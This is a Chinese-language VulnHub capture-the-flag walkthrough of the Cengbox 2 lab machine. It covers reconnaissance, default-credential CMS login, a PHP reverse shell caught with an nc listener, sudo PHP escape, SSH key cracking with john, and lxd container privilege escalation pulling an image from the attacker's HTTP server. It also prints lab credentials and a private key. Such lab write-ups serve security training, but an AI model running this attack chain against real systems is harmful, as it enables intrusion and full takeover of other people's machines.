Cengbox 2
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:03 1 60 Unknown vendor
192.168.56.100 08:00:27:ea:c7:5b 1 60 PCS Systemtechnik GmbH
192.168.56.254 08:00:27:ee:62:de 1 60 PCS Systemtechnik GmbH
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-22 20:09 EDT
Nmap scan report for localhost (192.168.56.254)
Host is up (0.00013s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.253
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 209 May 23 2020 note.txt
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:99:9d:e0:bc:07:3c:4f:53:e5:bc:27:35:80:e4:9e (RSA)
| 256 fe:60:a1:10:90:98:8e:b0:82:02:3b:40:bc:df:66:f1 (ECDSA)
|_ 256 3a:c3:a0:e7:bd:20:ca:1e:71:d4:3c:12:23:af:6a:c3 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site Maintenance
MAC Address: 08:00:27:EE:62:DE (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
获得Shell
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ ftp 192.168.56.254
Connected to 192.168.56.254.
220 (vsFTPd 3.0.3)
Name (192.168.56.254:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||56112|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 119 4096 May 23 2020 .
drwxr-xr-x 2 0 119 4096 May 23 2020 ..
-rw-r--r-- 1 0 0 209 May 23 2020 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||5618|)
150 Opening BINARY mode data connection for note.txt (209 bytes).
100% |****************************************************************************************************************| 209 488.28 KiB/s 00:00 ETA
226 Transfer complete.
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ cat note.txt
Hey Kevin,
I just set up your panel and used default password. Please change them before any hack.
I try to move site to new domain which name is ceng-company.vm and also I created a new area for you.
Aaron
域名:ceng-company.vm
可能的用户名: kevin, aaron
其他:kevin可能密码比较弱
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ curl http://192.168.56.254
<!doctype html>
<title>Site Maintenance</title>
<style>
body { text-align: center; padding: 150px; }
h1 { font-size: 50px; }
body { font: 20px Helvetica, sans-serif; color: #333; }
article { display: block; text-align: left; width: 650px; margin: 0 auto; }
a { color: #dc8100; text-decoration: none; }
a:hover { color: #333; text-decoration: none; }
</style>
<article>
<h1>Site Maintenance</h1>
<div>
<p>Sorry, We don't serve yet. You can check later the site. Regards </p> <p>— Ceng Company Team</p>
</div>
</article>
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ sudo vim /etc/hosts
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.254 ceng-company.vm
但是访问域名ceng-company.vm,返回页面内容没有发生变化
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ gobuster dir -u http://ceng-company.vm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.js,.sh
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://ceng-company.vm
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: php,html,txt,js,sh
[+] Timeout: 10s
===============================================================
2023/06/22 20:17:02 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 555]
/.html (Status: 403) [Size: 295]
/.php (Status: 403) [Size: 294]
/.html (Status: 403) [Size: 295]
/.php (Status: 403) [Size: 294]
/server-status (Status: 403) [Size: 303]
Progress: 1320683 / 1323366 (99.80%)
目录扫描没有啥收获,是否存在子域名?
─(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ wfuzz -c -u 'ceng-company.vm' -H 'Host:FUZZ.ceng-company.vm' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 76=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 400 12 L 53 W 422 Ch "# directory-list-2.3-medium.txt"
000000003: 400 12 L 53 W 422 Ch "# Copyright 2007 James Fisher"
000000007: 400 12 L 53 W 422 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"
000000013: 400 12 L 53 W 422 Ch "#"
000000011: 400 12 L 53 W 422 Ch "# Priority ordered case sensative list, where entries were found"
000000010: 400 12 L 53 W 422 Ch "#"
000000009: 400 12 L 53 W 422 Ch "# Suite 300, San Francisco, California, 94105, USA."
000000012: 400 12 L 53 W 422 Ch "# on atleast 2 different hosts"
000000006: 400 12 L 53 W 422 Ch "# Attribution-Share Alike 3.0 License. To view a copy of this"
000000005: 400 12 L 53 W 422 Ch "# This work is licensed under the Creative Commons"
000000008: 400 12 L 53 W 422 Ch "# or send a letter to Creative Commons, 171 Second Street,"
000000002: 400 12 L 53 W 422 Ch "#"
000000004: 400 12 L 53 W 422 Ch "#"
000000259: 403 11 L 32 W 296 Ch "admin"
发现admin子域名返回状态码为403
将该子域名加入到/etc/hosts文件:
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ sudo vim /etc/hosts
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.254 ceng-company.vm
192.168.56.254 admin.ceng-company.vm
访问admin.ceng-company.vm返回“Forbidden",是否应该扫描一下目录:
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ gobuster dir -u http://admin.ceng-company.vm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.bak,.sh,.js
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://admin.ceng-company.vm/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: js,php,html,txt,bak,sh
[+] Timeout: 10s
===============================================================
2023/06/22 20:31:01 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 301]
/.php (Status: 403) [Size: 300]
/.html (Status: 403) [Size: 301]
/.php (Status: 403) [Size: 300]
/server-status (Status: 403) [Size: 309]
/gila (Status: 301) [Size: 329] [--> http://admin.ceng-company.vm/gila/]
──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ gobuster dir -u http://admin.ceng-company.vm/gila/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.bak,.sh,.js
===============================================================
终于找到了登录的入口
尝试用户名为[email protected], 密码为admin
上传shell.php,发现被保存在assets目录下
访问下面的url:
http://admin.ceng-company.vm/gila/assets/shell.php
成功得到了shell
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ sudo nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.56.253] from (UNKNOWN) [192.168.56.254] 40688
Linux cengbox 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
17:39:51 up 34 min, 0 users, load average: 1.04, 4.65, 3.25
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@cengbox:/$ cd /home
cd /home
www-data@cengbox:/home$ ls -alh
ls -alh
total 16K
drwxr-xr-x 4 root root 4.0K May 23 2020 .
drwxr-xr-x 23 root root 4.0K May 23 2020 ..
drwxr-x--- 4 mitnick developers 4.0K May 25 2020 mitnick
drwxr-xr-x 4 swartz swartz 4.0K May 26 2020 swartz
www-data@cengbox:/home$ cd mitnick
cd mitnick
bash: cd: mitnick: Permission denied
www-data@cengbox:/home$ cd swartz
cd swartz
www-data@cengbox:/home/swartz$ ls -alh
ls -alh
total 44K
drwxr-xr-x 4 swartz swartz 4.0K May 26 2020 .
drwxr-xr-x 4 root root 4.0K May 23 2020 ..
-rw------- 1 swartz swartz 1 May 26 2020 .bash_history
-rw-r--r-- 1 swartz swartz 220 Aug 31 2015 .bash_logout
-rw-r--r-- 1 swartz swartz 3.7K Aug 31 2015 .bashrc
drwx------ 2 swartz swartz 4.0K May 23 2020 .cache
drwx------ 2 swartz developers 4.0K May 26 2020 .gnupg
-rw------- 1 swartz developers 1 May 26 2020 .php_history
-rw-r--r-- 1 swartz swartz 655 May 16 2017 .profile
-rw------- 1 swartz developers 1 May 26 2020 .viminfo
-rwxr-xr-x 1 swartz swartz 20 May 26 2020 runphp.sh
www-data@cengbox:/home/swartz$ cat runphp.sh
cat runphp.sh
#!/bin/bash
php -a
www-data@cengbox:/home/swartz$
www-data@cengbox:/var/www/admin/gila$ cat config.php
cat config.php
<?php
$GLOBALS['config'] = array (
'db' =>
array (
'host' => 'localhost',
'user' => 'root',
'pass' => 'SuperS3cR3TPassw0rd1!',
'name' => 'gila',
),
'permissions' =>
array (
1 =>
array (
0 => 'admin',
1 => 'admin_user',
2 => 'admin_userrole',
),
),
'packages' =>
array (
0 => 'blog',
),
'base' => 'http://admin.ceng-company.vm/gila/',
'theme' => 'gila-blog',
'title' => 'Gila CMS',
'slogan' => 'An awesome website!',
'default-controller' => 'blog',
'timezone' => 'America/Mexico_City',
'ssl' => '',
'env' => 'pro',
'check4updates' => 1,
'language' => 'en',
'admin_email' => '[email protected]',
'rewrite' => true,
www-data@cengbox:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on cengbox:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on cengbox:
(swartz) NOPASSWD: /home/swartz/runphp.sh
www-data@cengbox:/$ sudo -u swartz /home/swartz/runphp.sh
sudo -u swartz /home/swartz/runphp.sh
Interactive mode enabled
No entry for terminal type "unknown";
using dumb terminal settings.
php > system("/bin/bash")
system("/bin/bash")
php > id
id
php > ;
;
PHP Parse error: syntax error, unexpected 'id' (T_STRING) in php shell code on line 2
php > system("/bin/bash");
system("/bin/bash");
swartz@cengbox:/$ id
id
uid=1001(swartz) gid=1002(developers) groups=1002(developers)
swartz@cengbox:/$
swartz@cengbox:/home/mitnick$ cd .ssh
cd .ssh
swartz@cengbox:/home/mitnick/.ssh$ ls -alh
ls -alh
total 20K
drwxr-x--- 2 mitnick developers 4.0K May 25 2020 .
drwxr-x--- 4 mitnick developers 4.0K May 25 2020 ..
-rw-r--r-- 1 mitnick developers 397 May 25 2020 authorized_keys
-rw-r--r-- 1 mitnick developers 1.8K May 25 2020 id_rsa
-rw-r--r-- 1 mitnick developers 397 May 25 2020 id_rsa.pub
swartz@cengbox:/home/mitnick/.ssh$ cat id_rsa
cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,21425CA12E394F02C77645793C350D91
jOzfhmCwJQ8eqkzxuAgaXxy8Nh0AL1NR2dXz0tZVbSRRKdUcAeXQFkNYdAH+InjR
mg0FUtcz69l5iomrBHd71ZnK4iQMVcZZ37r8fAQppvZVGhKbf5DGmnyDZiTxGtdv
O6kEQOXOAVUce+bMDEgChMEdORmk2yisizjDi9IMttWQ3VMyaHoyRp2UOCjntZPC
KcpQMGjWJEos3ZrlIrfX/FSkfT0QkwdzkigeJsC7zH0AioH55tdfAY8d33AJuSQ0
7I7z5qMfn7tfNd8n642xFGnRV2YMCYiO8XB0f5OJz67T4doagB985ZNDtqJdxkoF
kXlqdvs1KJzCAMu9m0m4UV7ZR7qmYKiFXnEkl/hE9i3CF9S6UOjKKRZq26TpJVj4
a4WJ+yauszPVI9KlnB7X9g5cd3Xoe04ROWbaVhx0tv3ipjcbGOPcuQudiMH8P0rj
pXI0YD/nDSV9gCqfgi0wJTag8LK+4ZUENHu3ThukuONCGZpkdJg/UETu9m8Cl8CR
pa4khXbI+1J7frvqUFq+op3CBT4GccKUbD4B/Sa2BLjsOV75A/tpffr2ROo8KxaL
HFHJUqwhTCk6qp5Hx6tQWtaUQ7gdOJ1BMARts/x3rGpphdmSwqZqusdrw/KS3TbH
VkjpO5lABvEMGl2/HbB2flEZk+fkJ3YNq78+IQSxNSDFPsAIMySFmro+tf9X7KWu
hna6795X13c+WdE5hEsK6X2bOkZhFln/6Rkz5BsWNlaBVQwYfthfepN+e4NwdtcT
e/NZt/Cppe+J74ABmC8FyKVr+sbnb2MWWwg2nQ9aPEcDinjWk7ALtJbwIG46Udb9
l/c8/RSot4rRA3ADHj5JZtEAnnrwCHO7cc4yGLEJOneSPxz4yW8vSGDd7iAWjYuE
Y0CDY6iH2cvi3rrVrfUZ1beHMcegRtsTgPj2tbd7x4FD6xY+Vha+Va/OV6F7kuE7
fgS5uJs/WqCVemQWKLfa22AMeCRn5qB9AT1gAGbH5oFlrOtOvvbpZsdiRSp86mx5
/Pzrio/5e0kZ1b4+PF1cUOzFJOVOADl8hGQxE9LYOozxKGdSEP1oJOhThCGQVK8W
cQZ91RSt5tbQbhO3T4r8whOgOFyf3N/jEJ2IBzFKDZAqn0oxUzQFcBnsYIMhO29F
bTH6WyWaIy97HxSEzMmMUJo78n8uptNkglFPYp0LTzTEXsEYC6WxGBIihXQHEJlJ
1XxTCMoZFkZ2IpL9TmRtdWcqKBjiXLXuPjpMaIlg3tL8AEqR92stCPpyIVkfsxRf
j+FgaA97zTv8je+uGIAyv3fl3W69LOsMSTGwZutxngBsyhK3FbzF5r1c6c55jxXK
Tj+QuvPjLwGNT9KQ3XT4oGe5KSiSQ3ZhA4K1AhGyfCxhA2hdK7Y9RZVxKISCzjsY
4oNeFNZKIhTIWITNcr4/ebGiQuyLyOQpTgP6kpiLDYcZlPdIjdBAEjF+5rVcuxfB
xtHilk7LLiLarD6lFaF4bYoB2lwW0ioUzvZYUjLIT7RyrDa6tnidXI9aVAWgLFor
xi3Ed0lgkxkFm6AFQ0Zq1R8MqI4+6apX4nqqV/ybGpBFwpjgI//mOlHf9kdxp0Pk
-----END RSA PRIVATE KEY-----
将id_rsa文件内容拷贝并在Kali Linux本地创建id_rsa文件,修改权限,发现有口令保护,利用john工具破解,从而成功登录mitnick:
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ chmod 400 id_rsa
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ ssh -i id_rsa [email protected]
The authenticity of host '192.168.56.254 (192.168.56.254)' can't be established.
ED25519 key fingerprint is SHA256:uZvIZKaW470Qvua+TX3Wa1NqBXo7T/pWydAbAvGFVSQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.254' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ ssh2john id_rsa > hash
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
legend (id_rsa)
1g 0:00:00:00 DONE (2023-06-22 20:57) 2.702g/s 5232p/s 5232c/s 5232C/s amore..bubba1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ ssh -i id_rsa [email protected]
Enter passphrase for key 'id_rsa':
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
166 packages can be updated.
119 updates are security updates.
Last login: Tue May 26 07:12:16 2020 from 192.168.0.14
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
mitnick@cengbox:~$ id
uid=1000(mitnick) gid=1002(developers) groups=1002(developers),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare)
mitnick@cengbox:~$ ls -alh
total 48K
drwxr-x--- 4 mitnick developers 4.0K May 25 2020 .
drwxr-xr-x 4 root root 4.0K May 23 2020 ..
-rw------- 1 mitnick mitnick 1 May 26 2020 .bash_history
-rw-r--r-- 1 mitnick mitnick 220 May 23 2020 .bash_logout
-rw-r--r-- 1 mitnick mitnick 3.7K May 23 2020 .bashrc
drwx------ 2 mitnick mitnick 4.0K May 23 2020 .cache
-rw------- 1 mitnick mitnick 505 May 23 2020 .mysql_history
-rw------- 1 mitnick mitnick 1 May 26 2020 .php_history
-rw-r--r-- 1 mitnick mitnick 655 May 23 2020 .profile
drwxr-x--- 2 mitnick developers 4.0K May 25 2020 .ssh
-rw------- 1 mitnick mitnick 33 May 23 2020 user.txt
-rw------- 1 mitnick mitnick 1 May 26 2020 .viminfo
mitnick@cengbox:~$ cat user.txt
a10333b0b7c3f914e8c446fd8e9cd362
mitnick@cengbox:~$
由于mitnick用户属于lxd组,因此利用Lxd实现本地提权:
mitnick@cengbox:/tmp$ wget http://192.168.56.253:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
--2023-06-22 18:02:36-- http://192.168.56.253:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
Connecting to 192.168.56.253:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3259593 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.13-x86_64-20210218_0139.tar.gz’
alpine-v3.13-x86_64-20210218_0139.tar.g 100%[============================================================================>] 3.11M --.-KB/s in 0.01s
2023-06-22 18:02:36 (284 MB/s) - ‘alpine-v3.13-x86_64-20210218_0139.tar.gz’ saved [3259593/3259593]
mitnick@cengbox:/tmp$ lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
Image imported with fingerprint: cd73881adaac667ca3529972c7b380af240a9e3b09730f8c8e4e6a23e1a7892b
mitnick@cengbox:/tmp$ lxc init myimage ignite -c security.privileged=true
Creating ignite
mitnick@cengbox:/tmp$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to ignite
mitnick@cengbox:/tmp$ lxc start ignite
mitnick@cengbox:/tmp$ lxc exec ignite /bin/sh
~ # cd /mnt/root
/mnt/root # ls -alh
total 96K
drwxr-xr-x 23 root root 4.0K May 23 2020 .
drwxr-xr-x 3 root root 4.0K Jun 23 01:03 ..
drwxr-xr-x 2 root root 4.0K May 23 2020 bin
drwxr-xr-x 3 root root 4.0K May 23 2020 boot
drwxr-xr-x 18 root root 3.8K Jun 23 00:05 dev
drwxr-xr-x 92 root root 4.0K May 26 2020 etc
drwxr-xr-x 4 root root 4.0K May 23 2020 home
lrwxrwxrwx 1 root root 33 May 23 2020 initrd.img -> boot/initrd.img-4.4.0-142-generic
drwxr-xr-x 22 root root 4.0K May 25 2020 lib
drwxr-xr-x 2 root root 4.0K May 23 2020 lib64
drwx------ 2 root root 16.0K May 23 2020 lost+found
drwxr-xr-x 3 root root 4.0K May 23 2020 media
drwxr-xr-x 2 root root 4.0K Feb 26 2019 mnt
drwxr-xr-x 2 root root 4.0K May 25 2020 opt
dr-xr-xr-x 153 root root 0 Jun 23 00:05 proc
drwx------ 3 root root 4.0K May 26 2020 root
drwxr-xr-x 27 root root 960 Jun 23 01:03 run
drwxr-xr-x 2 root root 12.0K May 23 2020 sbin
drwxr-xr-x 2 root root 4.0K May 23 2020 snap
drwxr-xr-x 3 root root 4.0K May 23 2020 srv
dr-xr-xr-x 13 root root 0 Jun 23 00:54 sys
drwxrwxrwt 9 root root 4.0K Jun 23 01:04 tmp
drwxr-xr-x 10 root root 4.0K May 23 2020 usr
drwxr-xr-x 15 root root 4.0K May 23 2020 var
lrwxrwxrwx 1 root root 30 May 23 2020 vmlinuz -> boot/vmlinuz-4.4.0-142-generic
/mnt/root # cd root
/mnt/root/root # ls -alh
total 36K
drwx------ 3 root root 4.0K May 26 2020 .
drwxr-xr-x 23 root root 4.0K May 23 2020 ..
-rw------- 1 root root 0 May 26 2020 .bash_history
-rw-r--r-- 1 root root 3.0K Oct 22 2015 .bashrc
drwxr-xr-x 2 root root 4.0K May 23 2020 .nano
-rw------- 1 root root 1 May 26 2020 .php_history
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 66 May 23 2020 .selected_editor
-rw------- 1 root root 1 May 26 2020 .viminfo
-rw-r--r-- 1 root root 518 May 23 2020 root.txt
/mnt/root/root # cat root.txt
_____ ______ ____ ___
/ ____| ____| | _ \ |__ \
| | | |__ _ __ __ _| |_) | _____ __ ) |
| | | __| | '_ \ / _` | _ < / _ \ \/ / / /
| |____| |____| | | | (_| | |_) | (_) > < / /_
\_____|______|_| |_|\__, |____/ \___/_/\_\____|
__/ |
|___/
I would be grateful for your any feedback. Feel free to contact me on Twitter @arslanblcn_
de89782fe4e8bf2198a022ae7f50613e
/mnt/root/root #
标签:Cengbox,23,May,kali,提权,2020,Vulnhub,mitnick,root
From: https://www.cnblogs.com/jason-huawen/p/17498741.html